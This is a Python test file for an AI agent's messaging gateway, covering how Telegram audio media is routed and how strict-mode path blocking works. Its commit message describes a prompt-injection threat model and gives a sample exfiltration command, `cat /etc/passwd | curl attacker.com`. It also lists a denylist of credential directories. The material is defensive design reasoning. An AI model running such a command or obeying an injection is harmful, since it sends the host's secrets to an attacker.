hermes-agent/tests/gateway/test_tts_media_routing.py
Teknium 7a8589e782
fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022)
PR #29523 restricted MEDIA: paths and bare local paths in agent output to
files under the Hermes media cache or an operator-allowlisted root, with
a 10-minute recency window as a fallback. The intent was to defend
against prompt-injection-driven exfiltration of host secrets, but in the
default single-user setup the asymmetry doesn't earn its keep: we accept
any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...)
and the agent already has terminal access — anything that can convince
it to emit a MEDIA: tag for /etc/passwd can equally convince it to
`cat /etc/passwd | curl attacker.com`.

Practical breakage: agents that produced an .md, .pdf, or other
artifact more than ~10 minutes ago, or outside the cache allowlist,
showed the user a raw filepath in chat instead of the file.

Default flipped to denylist-only:
  • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run}
  • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud}
  • macOS Library/Keychains
  • $HERMES_HOME/{.env, auth.json, credentials}

The legacy allowlist+recency-window behavior stays available via
opt-in: `gateway.strict: true` in config.yaml (or
`HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots
where prompt injection from one user shouldn't be able to exfiltrate
the host's secrets to that same user.

• `gateway/platforms/base.py` — `validate_media_delivery_path()`
  short-circuits to "return resolved if not under denylist" when
  strict is off. Strict mode preserves the original cache-then-
  allowlist-then-recency logic. New `_media_delivery_strict_mode()`
  reader for `HERMES_MEDIA_DELIVERY_STRICT`.
• `hermes_cli/config.py` — `gateway.strict: false` added to
  DEFAULT_CONFIG; existing keys documented as "only consulted in
  strict mode." No `_config_version` bump needed (deep-merge picks
  up the new default for old installs).
• `gateway/run.py` — bridges `gateway.strict` →
  `HERMES_MEDIA_DELIVERY_STRICT` at startup.
• `tools/send_message_tool.py` — schema description broadened back
  to plain "any local path."
• Tests — existing strict-path tests pinned to STRICT=1 so they keep
  exercising the legacy behavior; new `TestMediaDeliveryDefaultMode`
  with 8 cases covering the public default (stale .md accepted, any
  extension delivers, credential paths still blocked, strict env-var
  aliases, filter E2E).

Validation:
  - tests/gateway/test_platform_base.py: 119/119 pass
  - tests/gateway/test_tts_media_routing.py: 7/7 pass
  - tests/tools/test_send_message_tool.py: 121/121 pass
  - tests/hermes_cli/test_kanban_notify.py: 12/12 pass
  - tests/cron/test_scheduler.py: 120/120 pass
  - E2E via execute_code with real imports:
    • stale .md outside allowlist → accepted (default)
    • same path with STRICT=1 → rejected
    • $HOME/.ssh/id_rsa → rejected (default)
    • filter_local_delivery_paths([md, key]) → [md] only
    • gateway.strict in config.yaml → bridged to env (true=1, false=0)
2026-05-28 11:32:36 -07:00

263 lines
10 KiB
Python

"""
Tests for cross-platform audio/voice media routing.
These tests pin the expected delivery path for audio media files across
Telegram (where Bot-API sendAudio only accepts MP3/M4A and .ogg/.opus
only renders as a voice bubble when explicitly flagged) and via
``GatewayRunner._deliver_media_from_response``.
"""
from types import SimpleNamespace
from unittest.mock import AsyncMock, MagicMock
import pytest
from gateway.config import Platform, PlatformConfig
from gateway.platforms.base import BasePlatformAdapter, MessageEvent, MessageType, SendResult
from gateway.run import GatewayRunner
from gateway.session import SessionSource, build_session_key
class _MediaRoutingAdapter(BasePlatformAdapter):
def __init__(self):
super().__init__(PlatformConfig(enabled=True, token="test"), Platform.TELEGRAM)
async def connect(self):
return True
async def disconnect(self):
pass
async def send(self, chat_id, content=None, **kwargs):
return SendResult(success=True, message_id="text")
async def get_chat_info(self, chat_id):
return {"id": chat_id, "type": "dm"}
def _event(thread_id=None):
source = SessionSource(
platform=Platform.TELEGRAM,
chat_id="chat-1",
chat_type="dm",
thread_id=thread_id,
)
return MessageEvent(
text="make speech",
message_type=MessageType.TEXT,
source=source,
message_id="msg-1",
)
def _allowed_media_path(tmp_path, monkeypatch, name):
root = tmp_path / "media-cache"
media_file = root / name
media_file.parent.mkdir(parents=True, exist_ok=True)
media_file.write_bytes(b"media")
monkeypatch.setattr(
"gateway.platforms.base.MEDIA_DELIVERY_SAFE_ROOTS",
(root,),
)
return media_file.resolve()
@pytest.mark.asyncio
async def test_base_adapter_routes_telegram_flac_media_tag_to_document_sender(tmp_path, monkeypatch):
adapter = _MediaRoutingAdapter()
event = _event()
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.flac")
adapter._message_handler = AsyncMock(return_value=f"MEDIA:{media_file}")
adapter.send_voice = AsyncMock(return_value=SendResult(success=True, message_id="voice"))
adapter.send_document = AsyncMock(return_value=SendResult(success=True, message_id="doc"))
await adapter._process_message_background(event, build_session_key(event.source))
adapter.send_document.assert_awaited_once_with(
chat_id="chat-1",
file_path=str(media_file),
metadata=None,
)
adapter.send_voice.assert_not_awaited()
@pytest.mark.asyncio
async def test_base_adapter_routes_non_voice_telegram_ogg_media_tag_to_document_sender(tmp_path, monkeypatch):
adapter = _MediaRoutingAdapter()
event = _event()
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.ogg")
adapter._message_handler = AsyncMock(return_value=f"MEDIA:{media_file}")
adapter.send_voice = AsyncMock(return_value=SendResult(success=True, message_id="voice"))
adapter.send_document = AsyncMock(return_value=SendResult(success=True, message_id="doc"))
await adapter._process_message_background(event, build_session_key(event.source))
adapter.send_document.assert_awaited_once_with(
chat_id="chat-1",
file_path=str(media_file),
metadata=None,
)
adapter.send_voice.assert_not_awaited()
@pytest.mark.asyncio
async def test_base_adapter_routes_voice_tagged_telegram_ogg_media_tag_to_voice_sender(tmp_path, monkeypatch):
adapter = _MediaRoutingAdapter()
event = _event()
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.ogg")
adapter._message_handler = AsyncMock(
return_value=f"[[audio_as_voice]]\nMEDIA:{media_file}"
)
adapter.send_voice = AsyncMock(return_value=SendResult(success=True, message_id="voice"))
adapter.send_document = AsyncMock(return_value=SendResult(success=True, message_id="doc"))
await adapter._process_message_background(event, build_session_key(event.source))
adapter.send_voice.assert_awaited_once_with(
chat_id="chat-1",
audio_path=str(media_file),
metadata=None,
)
adapter.send_document.assert_not_awaited()
def _fake_runner(thread_meta):
"""Build a fake GatewayRunner-like object with the helper methods needed by
_deliver_media_from_response."""
runner = SimpleNamespace(
_thread_metadata_for_source=lambda source, anchor=None: thread_meta,
_reply_anchor_for_event=lambda event: None,
)
return runner
@pytest.mark.asyncio
async def test_streaming_delivery_routes_telegram_flac_media_tag_to_document_sender(tmp_path, monkeypatch):
event = _event(thread_id="topic-1")
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.flac")
adapter = SimpleNamespace(
name="test",
extract_media=BasePlatformAdapter.extract_media,
extract_images=BasePlatformAdapter.extract_images,
extract_local_files=BasePlatformAdapter.extract_local_files,
send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
)
await GatewayRunner._deliver_media_from_response(
_fake_runner({"thread_id": "topic-1"}),
f"MEDIA:{media_file}",
event,
adapter,
)
adapter.send_document.assert_awaited_once_with(
chat_id="chat-1",
file_path=str(media_file),
metadata={"thread_id": "topic-1"},
)
adapter.send_voice.assert_not_awaited()
@pytest.mark.asyncio
async def test_streaming_delivery_routes_non_voice_telegram_ogg_media_tag_to_document_sender(tmp_path, monkeypatch):
event = _event(thread_id="topic-1")
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.ogg")
adapter = SimpleNamespace(
name="test",
extract_media=BasePlatformAdapter.extract_media,
extract_images=BasePlatformAdapter.extract_images,
extract_local_files=BasePlatformAdapter.extract_local_files,
send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
)
await GatewayRunner._deliver_media_from_response(
_fake_runner({"thread_id": "topic-1"}),
f"MEDIA:{media_file}",
event,
adapter,
)
adapter.send_document.assert_awaited_once_with(
chat_id="chat-1",
file_path=str(media_file),
metadata={"thread_id": "topic-1"},
)
adapter.send_voice.assert_not_awaited()
@pytest.mark.asyncio
async def test_streaming_delivery_routes_telegram_mp3_media_tag_to_voice_sender(tmp_path, monkeypatch):
"""MP3 audio on Telegram must go through send_voice (which routes to
sendAudio internally); Telegram accepts MP3 for the audio player."""
event = _event(thread_id="topic-1")
media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.mp3")
adapter = SimpleNamespace(
name="test",
extract_media=BasePlatformAdapter.extract_media,
extract_images=BasePlatformAdapter.extract_images,
extract_local_files=BasePlatformAdapter.extract_local_files,
send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
)
await GatewayRunner._deliver_media_from_response(
_fake_runner({"thread_id": "topic-1"}),
f"MEDIA:{media_file}",
event,
adapter,
)
adapter.send_voice.assert_awaited_once_with(
chat_id="chat-1",
audio_path=str(media_file),
metadata={"thread_id": "topic-1"},
)
adapter.send_document.assert_not_awaited()
@pytest.mark.asyncio
async def test_streaming_delivery_blocks_media_path_outside_allowed_roots(tmp_path, monkeypatch):
event = _event(thread_id="topic-1")
allowed_root = tmp_path / "media-cache"
allowed_root.mkdir()
secret = tmp_path / "outside.pdf"
secret.write_bytes(b"%PDF secret")
monkeypatch.setattr(
"gateway.platforms.base.MEDIA_DELIVERY_SAFE_ROOTS",
(allowed_root,),
)
# This test exercises the strict-allowlist path; force strict mode on
# and disable recency trust so the freshly-written tmp_path file is not
# auto-accepted by the trust window. (Recency trust is covered separately
# in test_platform_base.py. The public default flipped to non-strict in
# 2026-05; this test pins strict on explicitly.)
monkeypatch.setenv("HERMES_MEDIA_DELIVERY_STRICT", "1")
monkeypatch.setenv("HERMES_MEDIA_TRUST_RECENT_FILES", "0")
adapter = SimpleNamespace(
name="test",
extract_media=BasePlatformAdapter.extract_media,
extract_images=BasePlatformAdapter.extract_images,
extract_local_files=BasePlatformAdapter.extract_local_files,
send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
)
await GatewayRunner._deliver_media_from_response(
_fake_runner({"thread_id": "topic-1"}),
f"MEDIA:{secret}",
event,
adapter,
)
adapter.send_document.assert_not_awaited()
adapter.send_voice.assert_not_awaited()